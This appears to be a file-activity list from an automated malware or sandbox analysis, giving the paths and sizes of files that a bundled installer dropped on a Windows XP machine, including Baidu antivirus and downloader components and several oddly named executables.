%Program Files%\updatr\tj.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (57025 bytes)
%Program Files%\updatr\oovmdw_70745.exe (51840 bytes)
%Program Files%\updatr\uboskin\config.ini (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\pczh_107_306.exe (57056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\adwoca_00005.exe (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\wwwww_3340.exe (413400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spkjrjp_30279.exe (230878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\guagua_77150006814.exe (106373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\sha (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\cb16fabc\DMSet.Xml (675 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\dl.dll (14988 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (86466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\dl.dll (65930 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi13.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœ.lnk (715 bytes)
%Program Files%\ainqngz5.2\candid.exe (5520 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2.lnk (720 bytes)
%Program Files%\ainqngz5.2\uninstall.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (19409 bytes)
%Program Files%\ainqngz5.2\Ainqngz5.2.exe (4992 bytes)
%Program Files%\ainqngz5.2\schedule.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\Ã‚Â°Ã‚Â®Ãƒâ€¡ÃƒÂ©.Ãƒâ€“Ãƒâ€¡Ã‚Â»Ãƒâ€º.5.2.lnk (708 bytes)
%Documents and Settings%\%current user%\Templates\172014852040460\YYM_955WD30.gif (1134 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDLogicUtils.dll (30968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMSkin.dll (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh19.tmp (166951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMNetGetInfo.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\tmpt5zprs.dll (95827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\res\onlineWnd.zip (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\a[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\stj[1].ashx (3 bytes)
%Program Files%\yyfm0529\2014081705\Data\server.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\tj[1].ashx (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\ver[1].txt (36 bytes)
%WinDir%\Temp\Cab16.tmp (54 bytes)
%System%\config\SYSTEM.LOG (7714 bytes)
%System%\config\software (95028 bytes)
%System%\config\SOFTWARE.LOG (76196 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db (145 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%WinDir%\Temp\Cab14.tmp (54 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db-journal (512 bytes)
%WinDir%\Temp\Tar17.tmp (2712 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%System%\drivers\BDEnhanceBoost.sys (48 bytes)
%System%\drivers\BDMWrench.sys (1346 bytes)
C:\$Directory (576 bytes)
%WinDir%\Temp\Tar15.tmp (2712 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\BDMNetMonSusPlugin.dll (3721 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDSWShellExt.dll (1720 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\BDMSOAccServicePlugin.dll (1859 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMRepBase.dll (3897 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\FileMon.dll (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\KVCommonRes.rdb (109 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SysFixer.rdb (87 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSWNestCore.dll (6428 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTray.rdb (20 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«.lnk (823 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Patch\publish.db (32763 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\vcredist_x86.exe (17629 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMSysFixerPlugin.dll (5442 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (40 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNetGetInfo.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMSkin.dll (36698 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_XP_x86.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\ad.dll (6379 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\scan_mgr_config.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnBugRpt.exe (6437 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDNetMisc.dll (67 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDLogicUtils.dll (3811 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMStringUtils.dll (66 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SysOptDict.dat (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\SusPluginContainerConfig.xml (605 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_property.dat (267 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDMNetMon_WIN7_x86.sys (94 bytes)
%System%\drivers\BDMNetMon.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOHomePageCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMUpdate.rdb (1630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMDownload.dll (5520 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOSilentCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDArKit.sys (91 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SysAccLiveStrategy.dat (93 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\app.ico (1623 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSusPlugin.dll (3745 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDKVLogs.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_acc.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\PluginSetup.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\SysRepLib.dat (22 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\NetService.ini (590 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOPluginCleanerConfig.dat (442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMSOManagerPlugins\BDMSOAcceleratorPlugin.dll (6424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (111370 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixer.dll (267 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BDMSOCleaner\SOGarbageConfig.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\TrustAndIso.dll (262 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\LocalPluginInfo.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMCoolyPlugins\BDMSOAccCoolyPlugin.dll (1834 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SOTurbo.rdb (18 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCScriptBind.dll (3815 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\CommonRes.rdb (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerPreScan.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\PluginManager\PluginConfig.db (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\f2d00606824cd42a1c03eb9caa15e29f.bdt (631 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTips.rdb (183 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMMsg.dll (49 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (2132 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\BDMSWManagerFrame.dll (3725 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAn.exe (1683 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMScriptVM.dll (213 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\hips.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMSetting.rdb (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\dl.dll (65930 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDDownloader.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll.bdl (386923 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDASWAcc.exe (46 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTinyXml.dll (181 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86 (4 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDLogicUtils.dll.bdl (46921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNet.dll.bdl (32387 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccStrategyMgr.dll (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\res\onlineWnd.zip (14184 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMMainFrame.dll (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SWManager.rdb (1812 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\bd0001.sys (70 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSkin.dll (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\33f59beac1c942dd19f41a7fd30f3f9b.bdt (647 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\tmpjnmhqw.dll (27504 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\68905108990c088c31aead3b6d1651be.bdt (519 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SYSCleaner.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SORegCleanerScript.dat (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMUpdate.dll (3729 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOTraceConfig.xml (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\a644398e96b2e49d735a01f51e447930.bdt (3 bytes)
%System%\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\uninst.exe (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMCommon.dll (1609 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDCooly.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\BDMConnect.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDASoftmgr.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\PluginManager.dll (6359 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDAFileHelper.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SiteInspection.rdb (1868 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\kav_compatible.dat (25 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bg_tips_speed_win8.png (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_class_filter.db (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOGarbageConfig.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\bd0001.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\bd0002.sys (218 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SysAccelerator.rdb (1742 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDKitUtils.dll (62 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_repairproperty.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\BDMSafePlugin.dll (6420 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMKVMainPlugin.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\virus_type.dat (485 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\MainframePluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMAVEng.dll (6420 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCCallbackBind.dll (24 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMRepMgr.dll (3733 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\licenses\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SusPlugin.rdb (163 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\HotPlugins.xml (386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerLuaScript.dat (145 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMDownload.dll (324 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\GlobalPluginInfo.xml (25 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_appassext.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\blacksign.dat (537 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMProcessRunningTime.dll (82 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTray\TrayPlugin.rdb (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerScript.dat (58 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMBase.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmkvscanplugin\BDMKVScanPluginContainerConfig.xml (380 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_WIN7_x86.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\KVMain.rdb (55 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Mainpage.rdb (3831 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SafePlugin.rdb (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_5_speed.png (15 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«\Ã¥ÂÂ¸Ã¨Â½Â½Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«.lnk (796 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Unknownfile.rdb (48 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\websafe\WebSafe.dll (6428 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\CompatibilityChecker.dll (140 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOTraceCleanerConfig.dat (5 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMTrayTipsPlugin.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\BDMPatcher.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDSWShellExt64.dll (3664 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\pluginUnit.dat (727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMReport.dll.bdl (35046 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BDMSOCleaner\SOTraceConfig.xml (9 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSOAccTrayPlugin.dll (3733 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTips.exe (3743 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (552 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\bd0001.sys (160 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmkvscanplugin\BDMKVScanPlugin.dll (3745 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SOManager.rdb (1741 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\homepage.ini (361 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\BDMSOAccSusPlugin.dll (3737 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccDataMgr.dll (168 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0002.dll (1749 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMCoolyPlugins\BDMCoolyContainerConfig.xml (465 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_4_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\hu.dll (3312 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\patch\publish.db (30058 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\BDArKit.sys (80 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Patcher.rdb (143 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\PatcherContainer.xml (563 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\Pizmdb.7z (188613 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\DriverManager.dll (119 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSWParseDetect.dll (1613 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\SWCatalogDataItem.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_8_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMWindowsLib.dll (99 bytes)
%Documents and Settings%\All Users\Desktop\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¥ÂÂ«Ã¥Â£Â«.lnk (811 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GameNoDisturb.ini (215 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMNet.dll (6392 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\SafePluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\BDLogicUtils.dll (3832 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSOCleanerTrayPlugin.dll (3757 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDAVCache.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\EnhanceBoost.dll (275 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\systemfile.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_9_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\Softmgr.rdb (690 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_3_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccEngine.dll (111 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDMNetMon_XP_x86.sys (95 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMReport.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_0_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDEnhanceBoost.sys (96 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\bd0002.sys (205 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\BDMNetMon_WIN7_x64.sys (109 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCCommunicate.dll (28 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bd0001.dll (131 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_second_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\licenses\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDArKit.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDKV.rdb (29 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\bduf.dll (3823 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMFrameWork.dll (271 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMPatcherPlugin.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\HIPS.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SYSAccMgrDll.dll (3761 bytes)
%System%\drivers\BDArKit.sys (601 bytes)
